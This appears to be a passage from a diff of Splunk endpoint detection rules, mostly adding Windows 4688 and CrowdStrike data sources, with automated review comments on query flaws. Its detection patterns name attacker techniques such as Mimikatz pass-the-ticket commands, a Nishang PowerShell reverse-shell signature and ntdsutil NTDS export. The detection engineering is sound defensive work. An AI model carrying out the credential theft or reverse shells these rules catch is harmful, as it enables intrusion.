+- Sysmon EventID 1 AND Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
by _time Processes.process_id Processes.process_name Processes.dest Processes.process_guid
Processes.user | `drop_dm_object_name(Processes)` | join process_guid [| tstats
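Review bot: The correlation of process and registry events is done with `| join process_guid [| tstats ...`, and a Splunk join subsearch is bounded by default result-count and runtime limits, so on a busy estate the registry side is silently truncated and InProcServer32 modifications can be missed without any error. Filtering the `Endpoint.Registry` node on the target key first and then enriching with the much smaller matching Processes set, or collapsing both sides with `| stats values(...) by process_guid`, avoids the limit. The join subsearch and the registry filter continue past the end of this hunk, so only the left-hand side is visible here.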
diff --git a/detections/endpoint/malicious_powershell_process___encoded_command.yml b/detections/endpoint/malicious_powershell_process___encoded_command.yml
index 92ea9118aa..e4970cf1e8 100644
--- a/detections/endpoint/malicious_powershell_process___encoded_command.yml
+++ b/detections/endpoint/malicious_powershell_process___encoded_command.yml
@@ -16,6 +16,8 @@ description: 'The following analytic detects the use of the EncodedCommand param
tune based on known administrative scripts.'
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_powershell` by Processes.user
Processes.process_name Processes.process Processes.parent_process_name Processes.original_file_name
diff --git a/detections/endpoint/malicious_powershell_process___execution_policy_bypass.yml b/detections/endpoint/malicious_powershell_process___execution_policy_bypass.yml
index 6e76769dfa..07111d4bc2 100644
--- a/detections/endpoint/malicious_powershell_process___execution_policy_bypass.yml
+++ b/detections/endpoint/malicious_powershell_process___execution_policy_bypass.yml
@@ -15,6 +15,8 @@ description: The following analytic detects PowerShell processes initiated with
access within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process_id) as
process_id, values(Processes.parent_process_id) as parent_process_id values(Processes.process)
as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
diff --git a/detections/endpoint/malicious_powershell_process_with_obfuscation_techniques.yml b/detections/endpoint/malicious_powershell_process_with_obfuscation_techniques.yml
index ec80c4320d..38e345f8f3 100644
--- a/detections/endpoint/malicious_powershell_process_with_obfuscation_techniques.yml
+++ b/detections/endpoint/malicious_powershell_process_with_obfuscation_techniques.yml
@@ -14,7 +14,7 @@ description: The following analytic detects PowerShell processes launched with c
privilege escalation, or persistent access within the environment, posing a significant
security risk.
data_source:
-- Sysmon Event ID 1
+- Sysmon EventID 1
search: "| tstats `security_content_summariesonly` count values(Processes.process)
as process values(Processes.parent_process) as parent_process min(_time) as firstTime
max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell`
diff --git a/detections/endpoint/mimikatz_passtheticket_commandline_parameters.yml b/detections/endpoint/mimikatz_passtheticket_commandline_parameters.yml
index b2a5e25b11..2b34a30818 100644
--- a/detections/endpoint/mimikatz_passtheticket_commandline_parameters.yml
+++ b/detections/endpoint/mimikatz_passtheticket_commandline_parameters.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of Mimikatz command line par
within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process = "*sekurlsa::tickets
/export*" OR Processes.process = "*kerberos::ptt*") by Processes.dest Processes.user
diff --git a/detections/endpoint/mmc_lolbas_execution_process_spawn.yml b/detections/endpoint/mmc_lolbas_execution_process_spawn.yml
index 300a40f2d2..b07f02f030 100644
--- a/detections/endpoint/mmc_lolbas_execution_process_spawn.yml
+++ b/detections/endpoint/mmc_lolbas_execution_process_spawn.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies `mmc.exe` spawning a LOLBAS execu
and persistence within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name=mmc.exe)
(Processes.process_name IN ("Regsvcs.exe", "Ftp.exe", "OfflineScannerShell.exe",
diff --git a/detections/endpoint/modify_acl_permission_to_files_or_folder.yml b/detections/endpoint/modify_acl_permission_to_files_or_folder.yml
index 3e43502335..98c03804bc 100644
--- a/detections/endpoint/modify_acl_permission_to_files_or_folder.yml
+++ b/detections/endpoint/modify_acl_permission_to_files_or_folder.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the modification of ACL permissions
potentially leading to data breaches or further system compromise.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process) as process
values(Processes.process_id) as process_id count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name = "cacls.exe"
diff --git a/detections/endpoint/monitor_registry_keys_for_print_monitors.yml b/detections/endpoint/monitor_registry_keys_for_print_monitors.yml
index ad8a2096e8..ea1a640407 100644
--- a/detections/endpoint/monitor_registry_keys_for_print_monitors.yml
+++ b/detections/endpoint/monitor_registry_keys_for_print_monitors.yml
@@ -13,7 +13,7 @@ description: The following analytic detects modifications to the registry key `H
this could allow attackers to maintain persistence, execute code with high privileges,
and potentially compromise the entire system.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.action=modified AND Registry.registry_path="*CurrentControlSet\\Control\\Print\\Monitors*")
diff --git a/detections/endpoint/ms_exchange_mailbox_replication_service_writing_active_server_pages.yml b/detections/endpoint/ms_exchange_mailbox_replication_service_writing_active_server_pages.yml
index 288feba20e..41c700af5e 100644
--- a/detections/endpoint/ms_exchange_mailbox_replication_service_writing_active_server_pages.yml
+++ b/detections/endpoint/ms_exchange_mailbox_replication_service_writing_active_server_pages.yml
@@ -14,8 +14,7 @@ description: 'The following analytic identifies the creation of suspicious .aspx
maintain persistence within the environment. Immediate investigation and remediation
are crucial to prevent further compromise.'
data_source:
-- Sysmon EventID 1
-- Sysmon EventID 11
+- Sysmon EventID 1 AND Sysmon EventID 11
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
where Processes.process_name=MSExchangeMailboxReplication.exe by _time span=1h
Processes.process_id Processes.process_name Processes.process_guid Processes.dest
diff --git a/detections/endpoint/msbuild_suspicious_spawned_by_script_process.yml b/detections/endpoint/msbuild_suspicious_spawned_by_script_process.yml
index 8d752de08a..46d80c1e16 100644
--- a/detections/endpoint/msbuild_suspicious_spawned_by_script_process.yml
+++ b/detections/endpoint/msbuild_suspicious_spawned_by_script_process.yml
@@ -16,6 +16,8 @@ description: The following analytic detects the suspicious spawning of MSBuild.e
activities.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count values(Processes.process_name)
as process_name values(Processes.process) as process min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name
diff --git a/detections/endpoint/mshta_spawning_rundll32_or_regsvr32_process.yml b/detections/endpoint/mshta_spawning_rundll32_or_regsvr32_process.yml
index c4779b8195..ba8a54b183 100644
--- a/detections/endpoint/mshta_spawning_rundll32_or_regsvr32_process.yml
+++ b/detections/endpoint/mshta_spawning_rundll32_or_regsvr32_process.yml
@@ -14,6 +14,8 @@ description: The following analytic detects a suspicious mshta.exe process spawn
or download additional malware, posing a severe threat to the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name
= "mshta.exe" `process_rundll32` OR `process_regsvr32` by Processes.parent_process_name
diff --git a/detections/endpoint/msmpeng_application_dll_side_loading.yml b/detections/endpoint/msmpeng_application_dll_side_loading.yml
index 54cfc12b83..7418bfde83 100644
--- a/detections/endpoint/msmpeng_application_dll_side_loading.yml
+++ b/detections/endpoint/msmpeng_application_dll_side_loading.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the suspicious creation of msmpeng.e
system compromise, and potential data loss or extortion.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '|tstats `security_content_summariesonly` values(Filesystem.file_path) as
file_path count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem
where (Filesystem.file_name = "msmpeng.exe" OR Filesystem.file_name = "mpsvc.dll") AND
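Review bot: The added `Windows Event Log Security 4688` and `CrowdStrike ProcessRollup2` entries do not feed this search: it runs against `datamodel=Endpoint.Filesystem` on file_name/file_path, and both added sources are process-creation feeds that carry no file-write events. The pre-existing `Sysmon EventID 1` entry has the same problem; the file-creation source this repository pairs with Filesystem searches elsewhere in this change is `Sysmon EventID 11` (see the ms_exchange and office_application_drop_executable hunks). Suggest replacing the three process-creation entries with `- Sysmon EventID 11`, or with the corresponding file-event source if EDR file telemetry is meant to populate this datamodel. The search body continues outside the hunk.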
diff --git a/detections/endpoint/net_localgroup_discovery.yml b/detections/endpoint/net_localgroup_discovery.yml
index f8360cafad..bd88ee31cc 100644
--- a/detections/endpoint/net_localgroup_discovery.yml
+++ b/detections/endpoint/net_localgroup_discovery.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of the `net localgroup
could lead to further privilege escalation or lateral movement within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name=net.exe
OR Processes.process_name=net1.exe (Processes.process="*localgroup*") by Processes.dest
diff --git a/detections/endpoint/net_profiler_uac_bypass.yml b/detections/endpoint/net_profiler_uac_bypass.yml
index ea5b0dbdc2..4efe979c66 100644
--- a/detections/endpoint/net_profiler_uac_bypass.yml
+++ b/detections/endpoint/net_profiler_uac_bypass.yml
@@ -14,7 +14,7 @@ description: The following analytic detects modifications to the registry aimed
If confirmed malicious, this could allow an attacker to execute arbitrary code with
elevated privileges, compromising system integrity.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Registry where Registry.registry_path= "*\\Environment\\COR_PROFILER_PATH"
diff --git a/detections/endpoint/network_connection_discovery_with_arp.yml b/detections/endpoint/network_connection_discovery_with_arp.yml
index 39740f41b3..ab79da0570 100644
--- a/detections/endpoint/network_connection_discovery_with_arp.yml
+++ b/detections/endpoint/network_connection_discovery_with_arp.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `arp.exe` with the
lateral movement or attacks.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="arp.exe")
(Processes.process=*-a*) by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/network_connection_discovery_with_net.yml b/detections/endpoint/network_connection_discovery_with_net.yml
index 22ce817b64..35b00a4faa 100644
--- a/detections/endpoint/network_connection_discovery_with_net.yml
+++ b/detections/endpoint/network_connection_discovery_with_net.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of `net.exe` or `ne
attacks, potentially leading to data exfiltration or lateral movement.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="net.exe"
OR Processes.process_name="net1.exe") (Processes.process=*use*) by Processes.dest
diff --git a/detections/endpoint/network_connection_discovery_with_netstat.yml b/detections/endpoint/network_connection_discovery_with_netstat.yml
index 450173c2df..fe95b08f33 100644
--- a/detections/endpoint/network_connection_discovery_with_netstat.yml
+++ b/detections/endpoint/network_connection_discovery_with_netstat.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of `netstat.exe` with
critical systems, and plan further lateral movement or data exfiltration.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="netstat.exe")
(Processes.process=*-a*) by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/network_discovery_using_route_windows_app.yml b/detections/endpoint/network_discovery_using_route_windows_app.yml
index 8663d4e1c5..f5b53520ce 100644
--- a/detections/endpoint/network_discovery_using_route_windows_app.yml
+++ b/detections/endpoint/network_discovery_using_route_windows_app.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of the `route.exe` Win
administrative tasks or automated scripts.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_route` by Processes.dest
Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name
diff --git a/detections/endpoint/nishang_powershelltcponeline.yml b/detections/endpoint/nishang_powershelltcponeline.yml
index 0bfd311939..6959615fe3 100644
--- a/detections/endpoint/nishang_powershelltcponeline.yml
+++ b/detections/endpoint/nishang_powershelltcponeline.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the use of the Nishang Invoke-PowerS
remote access, data theft, or further compromise of the affected system.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_powershell` (Processes.process=*Net.Sockets.TCPClient*
AND Processes.process=*System.Text.ASCIIEncoding*) by Processes.dest Processes.user
diff --git a/detections/endpoint/nltest_domain_trust_discovery.yml b/detections/endpoint/nltest_domain_trust_discovery.yml
index ac75839a79..f7fe8fdc4b 100644
--- a/detections/endpoint/nltest_domain_trust_discovery.yml
+++ b/detections/endpoint/nltest_domain_trust_discovery.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of `nltest.exe` wit
further compromise and pivoting within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_nltest` (Processes.process=*/domain_trusts*
OR Processes.process=*/all_trusts*) by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/notepad_with_no_command_line_arguments.yml b/detections/endpoint/notepad_with_no_command_line_arguments.yml
index 419918270a..25f31f4117 100644
--- a/detections/endpoint/notepad_with_no_command_line_arguments.yml
+++ b/detections/endpoint/notepad_with_no_command_line_arguments.yml
@@ -7,6 +7,8 @@ type: TTP
status: production
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic identifies instances where Notepad.exe is launched
without any command line arguments, a behavior commonly associated with the SliverC2
framework. This detection leverages process creation events from Endpoint Detection
diff --git a/detections/endpoint/ntdsutil_export_ntds.yml b/detections/endpoint/ntdsutil_export_ntds.yml
index 34a70d201c..19227bf537 100644
--- a/detections/endpoint/ntdsutil_export_ntds.yml
+++ b/detections/endpoint/ntdsutil_export_ntds.yml
@@ -14,6 +14,8 @@ description: 'The following analytic detects the use of Ntdsutil to export the A
and privilege escalation within the network.'
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=ntdsutil.exe
Processes.process=*ntds* Processes.process=*create*) by Processes.dest Processes.user
diff --git a/detections/endpoint/office_application_drop_executable.yml b/detections/endpoint/office_application_drop_executable.yml
index 4991080650..3d99783b40 100644
--- a/detections/endpoint/office_application_drop_executable.yml
+++ b/detections/endpoint/office_application_drop_executable.yml
@@ -14,8 +14,7 @@ description: The following analytic detects Microsoft Office applications droppi
this activity could lead to code execution, privilege escalation, or persistent
access, posing a severe threat to the environment.
data_source:
-- Sysmon EventID 1
-- Sysmon EventID 11
+- Sysmon EventID 1 AND Sysmon EventID 11
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
where Processes.process_name IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","wordpad.exe","wordview.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe","msaccess.exe")
by _time span=1h Processes.process_id Processes.process_name Processes.process Processes.dest
diff --git a/detections/endpoint/office_application_spawn_regsvr32_process.yml b/detections/endpoint/office_application_spawn_regsvr32_process.yml
index bbf6fa1519..7c7186e554 100644
--- a/detections/endpoint/office_application_spawn_regsvr32_process.yml
+++ b/detections/endpoint/office_application_spawn_regsvr32_process.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies instances where an Office applica
potentially escalate privileges.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name
= "winword.exe" OR Processes.parent_process_name = "excel.exe" OR Processes.parent_process_name
diff --git a/detections/endpoint/office_application_spawn_rundll32_process.yml b/detections/endpoint/office_application_spawn_rundll32_process.yml
index 8c30efb8d2..d233706b21 100644
--- a/detections/endpoint/office_application_spawn_rundll32_process.yml
+++ b/detections/endpoint/office_application_spawn_rundll32_process.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies instances where an Office applica
lead to code execution, further system compromise, and potential data exfiltration.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name
= "winword.exe" OR Processes.parent_process_name = "excel.exe" OR Processes.parent_process_name
diff --git a/detections/endpoint/office_document_spawned_child_process_to_download.yml b/detections/endpoint/office_document_spawned_child_process_to_download.yml
index f359bb1535..01534f5b1a 100644
--- a/detections/endpoint/office_document_spawned_child_process_to_download.yml
+++ b/detections/endpoint/office_document_spawned_child_process_to_download.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies Office applications spawning chil
or further malware deployment, posing a severe threat to the organization's security.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name
IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe","msaccess.exe",
diff --git a/detections/endpoint/office_product_spawn_cmd_process.yml b/detections/endpoint/office_product_spawn_cmd_process.yml
index eefddc7ecd..fe08d92687 100644
--- a/detections/endpoint/office_product_spawn_cmd_process.yml
+++ b/detections/endpoint/office_product_spawn_cmd_process.yml
@@ -15,6 +15,8 @@ description: The following analytic detects an Office product spawning a CMD pro
activities.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name
= "winword.exe" OR Processes.parent_process_name= "excel.exe" OR Processes.parent_process_name
diff --git a/detections/endpoint/office_product_spawning_bitsadmin.yml b/detections/endpoint/office_product_spawning_bitsadmin.yml
index ec0b2821fe..b3e2d4d3ad 100644
--- a/detections/endpoint/office_product_spawning_bitsadmin.yml
+++ b/detections/endpoint/office_product_spawning_bitsadmin.yml
@@ -15,6 +15,8 @@ description: The following analytic detects any Windows Office Product spawning
compromise of the affected system.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name
IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe",
diff --git a/detections/endpoint/office_product_spawning_certutil.yml b/detections/endpoint/office_product_spawning_certutil.yml
index 4f69c47264..16a928f462 100644
--- a/detections/endpoint/office_product_spawning_certutil.yml
+++ b/detections/endpoint/office_product_spawning_certutil.yml
@@ -15,6 +15,8 @@ description: The following analytic detects any Windows Office Product spawning
to prevent potential damage.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name
IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe","msaccess.exe",
diff --git a/detections/endpoint/office_product_spawning_mshta.yml b/detections/endpoint/office_product_spawning_mshta.yml
index 77be35a956..8c0cf83a9b 100644
--- a/detections/endpoint/office_product_spawning_mshta.yml
+++ b/detections/endpoint/office_product_spawning_mshta.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies instances where a Microsoft Offic
further malware deployment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name
IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe", "onenote.exe","onenotem.exe",
diff --git a/detections/endpoint/office_product_spawning_rundll32_with_no_dll.yml b/detections/endpoint/office_product_spawning_rundll32_with_no_dll.yml
index b0350eb750..c2bf3c1353 100644
--- a/detections/endpoint/office_product_spawning_rundll32_with_no_dll.yml
+++ b/detections/endpoint/office_product_spawning_rundll32_with_no_dll.yml
@@ -15,6 +15,8 @@ description: The following analytic detects any Windows Office Product spawning
are recommended.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name
IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe",
diff --git a/detections/endpoint/office_product_spawning_windows_script_host.yml b/detections/endpoint/office_product_spawning_windows_script_host.yml
index b85621a116..0ac2621443 100644
--- a/detections/endpoint/office_product_spawning_windows_script_host.yml
+++ b/detections/endpoint/office_product_spawning_windows_script_host.yml
@@ -14,6 +14,8 @@ description: The following analytic detects an Office product spawning WScript.e
code execution, data exfiltration, or further system compromise.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name
IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe",
diff --git a/detections/endpoint/office_product_spawning_wmic.yml b/detections/endpoint/office_product_spawning_wmic.yml
index e6be1c2d40..a2fdc495a4 100644
--- a/detections/endpoint/office_product_spawning_wmic.yml
+++ b/detections/endpoint/office_product_spawning_wmic.yml
@@ -15,6 +15,8 @@ description: The following analytic detects any Windows Office Product spawning
lateral movement within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name
IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe","msaccess.exe",
diff --git a/detections/endpoint/office_product_writing_cab_or_inf.yml b/detections/endpoint/office_product_writing_cab_or_inf.yml
index b72c3790b4..ca2b9bca25 100644
--- a/detections/endpoint/office_product_writing_cab_or_inf.yml
+++ b/detections/endpoint/office_product_writing_cab_or_inf.yml
@@ -14,6 +14,8 @@ description: The following analytic detects Office products writing .cab or .inf
control over the affected system and potentially compromise sensitive data.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
- Sysmon EventID 11
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
where Processes.process_name IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","wordpad.exe","wordview.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe","msaccess.exe")
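Review bot: The two process-creation sources are inserted between `Sysmon EventID 1` and `Sysmon EventID 11`, which makes this list inconsistent with the sibling office_application_drop_executable hunk in the same change, where the identical EventID 1 + EventID 11 pairing for a Processes search (presumably joined to Filesystem, as the description's "writing .cab or .inf" implies) was collapsed to `Sysmon EventID 1 AND Sysmon EventID 11`. As written, a reader cannot tell that 4688 or ProcessRollup2 alone is insufficient because they cover only the process half. Whichever convention is kept, apply it to both files; at minimum move `- Sysmon EventID 11` directly after `- Sysmon EventID 1` so the process sources and the file source are not interleaved. The search body continues outside the hunk.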
diff --git a/detections/endpoint/office_spawning_control.yml b/detections/endpoint/office_spawning_control.yml
index 0ea96e2f34..4c426962fa 100644
--- a/detections/endpoint/office_spawning_control.yml
+++ b/detections/endpoint/office_spawning_control.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies instances where `control.exe` is
the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name
IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","wordpad.exe","wordview.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe","msaccess.exe")
diff --git a/detections/endpoint/outbound_network_connection_from_java_using_default_ports.yml b/detections/endpoint/outbound_network_connection_from_java_using_default_ports.yml
index 40b85044fc..0e8f8fe2c2 100644
--- a/detections/endpoint/outbound_network_connection_from_java_using_default_ports.yml
+++ b/detections/endpoint/outbound_network_connection_from_java_using_default_ports.yml
@@ -13,7 +13,7 @@ description: The following analytic detects outbound network connections from Ja
JNDI lookups and retrieve malicious payloads. If confirmed malicious, this activity
could lead to remote code execution and further compromise of the affected server.
data_source:
-- Sysmon EventID 1
+- Sysmon EventID 1 AND Sysmon EventID 3
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
where (Processes.process_name="java.exe" OR Processes.process_name=javaw.exe OR
Processes.process_name=javaw.exe) by _time Processes.process_id Processes.process_name
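Review bot: The `where` clause on the new side repeats `Processes.process_name=javaw.exe` twice (`OR Processes.process_name=javaw.exe OR Processes.process_name=javaw.exe`); the duplicate is a no-op, and if a third Java launcher was meant to be covered it is silently missing. Since this commit already edits the file to widen its data sources, either drop the repeated term or replace it with the intended binary, e.g. `where (Processes.process_name="java.exe" OR Processes.process_name="javaw.exe")`. The quoting is also mixed (`"java.exe"` versus bare `javaw.exe`); pick one. The search body continues outside the hunk.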
diff --git a/detections/endpoint/password_policy_discovery_with_net.yml b/detections/endpoint/password_policy_discovery_with_net.yml
index 2f87a9098d..6b697a7d73 100644
--- a/detections/endpoint/password_policy_discovery_with_net.yml
+++ b/detections/endpoint/password_policy_discovery_with_net.yml
@@ -16,6 +16,8 @@ description: The following analytic identifies the execution of `net.exe` or `ne
the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="net.exe"
OR Processes.process_name="net1.exe") AND Processes.process = "*accounts*" AND Processes.process
diff --git a/detections/endpoint/permission_modification_using_takeown_app.yml b/detections/endpoint/permission_modification_using_takeown_app.yml
index 1b646b1786..45039ce8d3 100644
--- a/detections/endpoint/permission_modification_using_takeown_app.yml
+++ b/detections/endpoint/permission_modification_using_takeown_app.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the modification of file or director
availability of critical data.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "takeown.exe"
Processes.process = "*/f*" by Processes.parent_process_name Processes.parent_process
diff --git a/detections/endpoint/ping_sleep_batch_command.yml b/detections/endpoint/ping_sleep_batch_command.yml
index 647878ca12..a0e7829645 100644
--- a/detections/endpoint/ping_sleep_batch_command.yml
+++ b/detections/endpoint/ping_sleep_batch_command.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of ping sleep batch
exfiltration.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_ping` (Processes.parent_process
= "*ping*" Processes.parent_process = *-n* Processes.parent_process="* Nul*"Processes.parent_process="*>*")
diff --git a/detections/endpoint/possible_browser_pass_view_parameter.yml b/detections/endpoint/possible_browser_pass_view_parameter.yml
index c2e79b5818..8af97a9021 100644
